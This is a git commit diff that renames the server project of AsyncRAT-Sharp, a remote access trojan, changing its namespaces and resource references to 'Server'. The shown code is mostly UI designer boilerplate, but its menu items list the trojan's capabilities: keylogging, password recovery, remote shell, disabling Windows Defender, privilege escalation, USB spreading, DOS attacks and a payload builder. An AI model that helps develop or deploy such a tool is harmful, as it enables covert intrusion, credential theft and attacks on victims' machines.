Rename the server project
This commit is contained in:
parent
f8ee3c0f5f
commit
15d3d2d07e
@ -1,9 +1,9 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio 15
|
# Visual Studio Version 16
|
||||||
VisualStudioVersion = 15.0.28307.168
|
VisualStudioVersion = 16.0.29009.5
|
||||||
MinimumVisualStudioVersion = 10.0.40219.1
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AsyncRAT-Sharp", "AsyncRAT-Sharp\AsyncRAT-Sharp.csproj", "{7767C300-5FD5-4A5D-9D4C-59559CCE48A3}"
|
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server\Server.csproj", "{7767C300-5FD5-4A5D-9D4C-59559CCE48A3}"
|
||||||
EndProject
|
EndProject
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}"
|
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}"
|
||||||
EndProject
|
EndProject
|
||||||
|
@ -7,7 +7,7 @@ using System.Security.Cryptography;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Cryptography
|
namespace Server.Cryptography
|
||||||
{
|
{
|
||||||
public class Aes256
|
public class Aes256
|
||||||
{
|
{
|
@ -1,7 +1,7 @@
|
|||||||
using System.Security.Cryptography;
|
using System.Security.Cryptography;
|
||||||
using System.Text;
|
using System.Text;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Cryptography
|
namespace Server.Cryptography
|
||||||
{
|
{
|
||||||
public static class Sha256
|
public static class Sha256
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp
|
namespace Server
|
||||||
{
|
{
|
||||||
partial class Form1
|
partial class Form1
|
||||||
{
|
{
|
||||||
@ -223,7 +223,7 @@
|
|||||||
//
|
//
|
||||||
// aBOUTToolStripMenuItem
|
// aBOUTToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.aBOUTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.info;
|
this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
|
||||||
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
|
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
|
||||||
this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.aBOUTToolStripMenuItem.Text = "ABOUT";
|
this.aBOUTToolStripMenuItem.Text = "ABOUT";
|
||||||
@ -239,7 +239,7 @@
|
|||||||
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
||||||
this.tOMEMORYToolStripMenuItem,
|
this.tOMEMORYToolStripMenuItem,
|
||||||
this.tODISKToolStripMenuItem});
|
this.tODISKToolStripMenuItem});
|
||||||
this.sENDFILEToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.tomem;
|
this.sENDFILEToolStripMenuItem.Image = global::Server.Properties.Resources.tomem;
|
||||||
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
|
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
|
||||||
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.sENDFILEToolStripMenuItem.Text = "Send File";
|
this.sENDFILEToolStripMenuItem.Text = "Send File";
|
||||||
@ -267,14 +267,14 @@
|
|||||||
this.fileManagerToolStripMenuItem1,
|
this.fileManagerToolStripMenuItem1,
|
||||||
this.processManagerToolStripMenuItem1,
|
this.processManagerToolStripMenuItem1,
|
||||||
this.reportWindowToolStripMenuItem});
|
this.reportWindowToolStripMenuItem});
|
||||||
this.monitoringToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.monitoring_system;
|
this.monitoringToolStripMenuItem.Image = global::Server.Properties.Resources.monitoring_system;
|
||||||
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
|
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
|
||||||
this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.monitoringToolStripMenuItem.Text = "Monitoring";
|
this.monitoringToolStripMenuItem.Text = "Monitoring";
|
||||||
//
|
//
|
||||||
// remoteDesktopToolStripMenuItem1
|
// remoteDesktopToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.remoteDesktopToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.remotedesktop;
|
this.remoteDesktopToolStripMenuItem1.Image = global::Server.Properties.Resources.remotedesktop;
|
||||||
this.remoteDesktopToolStripMenuItem1.Name = "remoteDesktopToolStripMenuItem1";
|
this.remoteDesktopToolStripMenuItem1.Name = "remoteDesktopToolStripMenuItem1";
|
||||||
this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.remoteDesktopToolStripMenuItem1.Text = "Remote Desktop";
|
this.remoteDesktopToolStripMenuItem1.Text = "Remote Desktop";
|
||||||
@ -282,7 +282,7 @@
|
|||||||
//
|
//
|
||||||
// keyloggerToolStripMenuItem1
|
// keyloggerToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.keyloggerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.logger;
|
this.keyloggerToolStripMenuItem1.Image = global::Server.Properties.Resources.logger;
|
||||||
this.keyloggerToolStripMenuItem1.Name = "keyloggerToolStripMenuItem1";
|
this.keyloggerToolStripMenuItem1.Name = "keyloggerToolStripMenuItem1";
|
||||||
this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.keyloggerToolStripMenuItem1.Text = "Keylogger";
|
this.keyloggerToolStripMenuItem1.Text = "Keylogger";
|
||||||
@ -290,7 +290,7 @@
|
|||||||
//
|
//
|
||||||
// passwordRecoveryToolStripMenuItem1
|
// passwordRecoveryToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.passwordRecoveryToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.key;
|
this.passwordRecoveryToolStripMenuItem1.Image = global::Server.Properties.Resources.key;
|
||||||
this.passwordRecoveryToolStripMenuItem1.Name = "passwordRecoveryToolStripMenuItem1";
|
this.passwordRecoveryToolStripMenuItem1.Name = "passwordRecoveryToolStripMenuItem1";
|
||||||
this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.passwordRecoveryToolStripMenuItem1.Text = "Password Recovery";
|
this.passwordRecoveryToolStripMenuItem1.Text = "Password Recovery";
|
||||||
@ -298,7 +298,7 @@
|
|||||||
//
|
//
|
||||||
// fileManagerToolStripMenuItem1
|
// fileManagerToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.fileManagerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager;
|
this.fileManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.filemanager;
|
||||||
this.fileManagerToolStripMenuItem1.Name = "fileManagerToolStripMenuItem1";
|
this.fileManagerToolStripMenuItem1.Name = "fileManagerToolStripMenuItem1";
|
||||||
this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.fileManagerToolStripMenuItem1.Text = "File Manager";
|
this.fileManagerToolStripMenuItem1.Text = "File Manager";
|
||||||
@ -306,7 +306,7 @@
|
|||||||
//
|
//
|
||||||
// processManagerToolStripMenuItem1
|
// processManagerToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.processManagerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.process;
|
this.processManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.process;
|
||||||
this.processManagerToolStripMenuItem1.Name = "processManagerToolStripMenuItem1";
|
this.processManagerToolStripMenuItem1.Name = "processManagerToolStripMenuItem1";
|
||||||
this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.processManagerToolStripMenuItem1.Text = "Process Manager";
|
this.processManagerToolStripMenuItem1.Text = "Process Manager";
|
||||||
@ -317,7 +317,7 @@
|
|||||||
this.reportWindowToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
this.reportWindowToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
||||||
this.runToolStripMenuItem1,
|
this.runToolStripMenuItem1,
|
||||||
this.stopToolStripMenuItem2});
|
this.stopToolStripMenuItem2});
|
||||||
this.reportWindowToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.report;
|
this.reportWindowToolStripMenuItem.Image = global::Server.Properties.Resources.report;
|
||||||
this.reportWindowToolStripMenuItem.Name = "reportWindowToolStripMenuItem";
|
this.reportWindowToolStripMenuItem.Name = "reportWindowToolStripMenuItem";
|
||||||
this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
|
this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
|
||||||
this.reportWindowToolStripMenuItem.Text = "Report Window";
|
this.reportWindowToolStripMenuItem.Text = "Report Window";
|
||||||
@ -347,14 +347,14 @@
|
|||||||
this.remoteShellToolStripMenuItem1,
|
this.remoteShellToolStripMenuItem1,
|
||||||
this.dOSAttackToolStripMenuItem,
|
this.dOSAttackToolStripMenuItem,
|
||||||
this.executeNETCodeToolStripMenuItem});
|
this.executeNETCodeToolStripMenuItem});
|
||||||
this.miscellaneousToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.Miscellaneous;
|
this.miscellaneousToolStripMenuItem.Image = global::Server.Properties.Resources.Miscellaneous;
|
||||||
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
|
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
|
||||||
this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
|
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
|
||||||
//
|
//
|
||||||
// getAdminPrivilegesToolStripMenuItem
|
// getAdminPrivilegesToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
|
this.getAdminPrivilegesToolStripMenuItem.Image = global::Server.Properties.Resources.uac;
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem";
|
this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem";
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges";
|
this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges";
|
||||||
@ -362,7 +362,7 @@
|
|||||||
//
|
//
|
||||||
// disableWindowsDefenderToolStripMenuItem
|
// disableWindowsDefenderToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.disableWindowsDefenderToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled;
|
this.disableWindowsDefenderToolStripMenuItem.Image = global::Server.Properties.Resources.disabled;
|
||||||
this.disableWindowsDefenderToolStripMenuItem.Name = "disableWindowsDefenderToolStripMenuItem";
|
this.disableWindowsDefenderToolStripMenuItem.Name = "disableWindowsDefenderToolStripMenuItem";
|
||||||
this.disableWindowsDefenderToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
this.disableWindowsDefenderToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
|
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
|
||||||
@ -370,7 +370,7 @@
|
|||||||
//
|
//
|
||||||
// botsKillerToolStripMenuItem
|
// botsKillerToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.botsKillerToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller;
|
this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
|
||||||
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
|
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
|
||||||
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
|
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
|
||||||
@ -378,7 +378,7 @@
|
|||||||
//
|
//
|
||||||
// uSBSpreadToolStripMenuItem1
|
// uSBSpreadToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.uSBSpreadToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.usb;
|
this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
|
||||||
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
|
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
|
||||||
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
||||||
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
|
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
|
||||||
@ -386,7 +386,7 @@
|
|||||||
//
|
//
|
||||||
// seedTorrentToolStripMenuItem1
|
// seedTorrentToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.seedTorrentToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.u_torrent_logo;
|
this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
|
||||||
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
|
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
|
||||||
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
||||||
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
|
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
|
||||||
@ -394,7 +394,7 @@
|
|||||||
//
|
//
|
||||||
// remoteShellToolStripMenuItem1
|
// remoteShellToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.remoteShellToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.shell;
|
this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
|
||||||
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
|
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
|
||||||
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
||||||
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
|
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
|
||||||
@ -402,7 +402,7 @@
|
|||||||
//
|
//
|
||||||
// dOSAttackToolStripMenuItem
|
// dOSAttackToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.dOSAttackToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
|
this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
|
||||||
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
|
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
|
||||||
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
|
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
|
||||||
@ -410,7 +410,7 @@
|
|||||||
//
|
//
|
||||||
// executeNETCodeToolStripMenuItem
|
// executeNETCodeToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.executeNETCodeToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.coding;
|
this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
|
||||||
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
|
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
|
||||||
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
|
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
|
||||||
@ -422,14 +422,14 @@
|
|||||||
this.visitWebsiteToolStripMenuItem1,
|
this.visitWebsiteToolStripMenuItem1,
|
||||||
this.sendMessageBoxToolStripMenuItem1,
|
this.sendMessageBoxToolStripMenuItem1,
|
||||||
this.chatToolStripMenuItem1});
|
this.chatToolStripMenuItem1});
|
||||||
this.extraToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.extra;
|
this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
|
||||||
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
|
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
|
||||||
this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.extraToolStripMenuItem.Text = "Extra";
|
this.extraToolStripMenuItem.Text = "Extra";
|
||||||
//
|
//
|
||||||
// visitWebsiteToolStripMenuItem1
|
// visitWebsiteToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.visitWebsiteToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.visit;
|
this.visitWebsiteToolStripMenuItem1.Image = global::Server.Properties.Resources.visit;
|
||||||
this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1";
|
this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1";
|
||||||
this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.visitWebsiteToolStripMenuItem1.Text = "Visit Website";
|
this.visitWebsiteToolStripMenuItem1.Text = "Visit Website";
|
||||||
@ -437,7 +437,7 @@
|
|||||||
//
|
//
|
||||||
// sendMessageBoxToolStripMenuItem1
|
// sendMessageBoxToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.sendMessageBoxToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.msgbox;
|
this.sendMessageBoxToolStripMenuItem1.Image = global::Server.Properties.Resources.msgbox;
|
||||||
this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1";
|
this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1";
|
||||||
this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox";
|
this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox";
|
||||||
@ -445,7 +445,7 @@
|
|||||||
//
|
//
|
||||||
// chatToolStripMenuItem1
|
// chatToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.chatToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.chat;
|
this.chatToolStripMenuItem1.Image = global::Server.Properties.Resources.chat;
|
||||||
this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1";
|
this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1";
|
||||||
this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
||||||
this.chatToolStripMenuItem1.Text = "Chat";
|
this.chatToolStripMenuItem1.Text = "Chat";
|
||||||
@ -456,7 +456,7 @@
|
|||||||
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
||||||
this.clientToolStripMenuItem,
|
this.clientToolStripMenuItem,
|
||||||
this.pCToolStripMenuItem});
|
this.pCToolStripMenuItem});
|
||||||
this.systemToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.system;
|
this.systemToolStripMenuItem.Image = global::Server.Properties.Resources.system;
|
||||||
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
|
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
|
||||||
this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.systemToolStripMenuItem.Text = "System";
|
this.systemToolStripMenuItem.Text = "System";
|
||||||
@ -470,7 +470,7 @@
|
|||||||
this.uninstallToolStripMenuItem,
|
this.uninstallToolStripMenuItem,
|
||||||
this.toolStripSeparator3,
|
this.toolStripSeparator3,
|
||||||
this.showFolderToolStripMenuItem});
|
this.showFolderToolStripMenuItem});
|
||||||
this.clientToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.client;
|
this.clientToolStripMenuItem.Image = global::Server.Properties.Resources.client;
|
||||||
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
|
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
|
||||||
this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
|
this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
|
||||||
this.clientToolStripMenuItem.Text = "Client";
|
this.clientToolStripMenuItem.Text = "Client";
|
||||||
@ -521,7 +521,7 @@
|
|||||||
this.logoffToolStripMenuItem1,
|
this.logoffToolStripMenuItem1,
|
||||||
this.restartToolStripMenuItem3,
|
this.restartToolStripMenuItem3,
|
||||||
this.shutdownToolStripMenuItem1});
|
this.shutdownToolStripMenuItem1});
|
||||||
this.pCToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.pc;
|
this.pCToolStripMenuItem.Image = global::Server.Properties.Resources.pc;
|
||||||
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
|
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
|
||||||
this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
|
this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
|
||||||
this.pCToolStripMenuItem.Text = "PC";
|
this.pCToolStripMenuItem.Text = "PC";
|
||||||
@ -554,7 +554,7 @@
|
|||||||
//
|
//
|
||||||
// bUILDERToolStripMenuItem
|
// bUILDERToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.bUILDERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.builder;
|
this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
|
||||||
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
|
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
|
||||||
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.bUILDERToolStripMenuItem.Text = "BUILDER";
|
this.bUILDERToolStripMenuItem.Text = "BUILDER";
|
||||||
@ -711,7 +711,7 @@
|
|||||||
//
|
//
|
||||||
// sTARTToolStripMenuItem
|
// sTARTToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.sTARTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.play_button;
|
this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button;
|
||||||
this.sTARTToolStripMenuItem.Name = "sTARTToolStripMenuItem";
|
this.sTARTToolStripMenuItem.Name = "sTARTToolStripMenuItem";
|
||||||
this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
|
this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
|
||||||
this.sTARTToolStripMenuItem.Text = "START";
|
this.sTARTToolStripMenuItem.Text = "START";
|
||||||
@ -719,7 +719,7 @@
|
|||||||
//
|
//
|
||||||
// sTOPToolStripMenuItem
|
// sTOPToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.sTOPToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.stop__1_;
|
this.sTOPToolStripMenuItem.Image = global::Server.Properties.Resources.stop__1_;
|
||||||
this.sTOPToolStripMenuItem.Name = "sTOPToolStripMenuItem";
|
this.sTOPToolStripMenuItem.Name = "sTOPToolStripMenuItem";
|
||||||
this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
|
this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
|
||||||
this.sTOPToolStripMenuItem.Text = "STOP";
|
this.sTOPToolStripMenuItem.Text = "STOP";
|
@ -1,19 +1,19 @@
|
|||||||
using System;
|
using System;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using Microsoft.VisualBasic;
|
using Microsoft.VisualBasic;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.Cryptography;
|
using Server.Cryptography;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Net.Sockets;
|
using System.Net.Sockets;
|
||||||
using AsyncRAT_Sharp.Handle_Packet;
|
using Server.Handle_Packet;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
using System.Security.Cryptography.X509Certificates;
|
using System.Security.Cryptography.X509Certificates;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
|
|
||||||
@ -25,7 +25,7 @@ using System.Collections.Generic;
|
|||||||
This program Is distributed for educational purposes only.
|
This program Is distributed for educational purposes only.
|
||||||
*/
|
*/
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp
|
namespace Server
|
||||||
{
|
{
|
||||||
|
|
||||||
public partial class Form1 : Form
|
public partial class Form1 : Form
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormAbout
|
partial class FormAbout
|
||||||
{
|
{
|
@ -8,7 +8,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormAbout : Form
|
public partial class FormAbout : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormBuilder
|
partial class FormBuilder
|
||||||
{
|
{
|
||||||
@ -220,13 +220,13 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// txtPastebin
|
// txtPastebin
|
||||||
//
|
//
|
||||||
this.txtPastebin.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Pastebin", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtPastebin.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Pastebin", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtPastebin.Enabled = false;
|
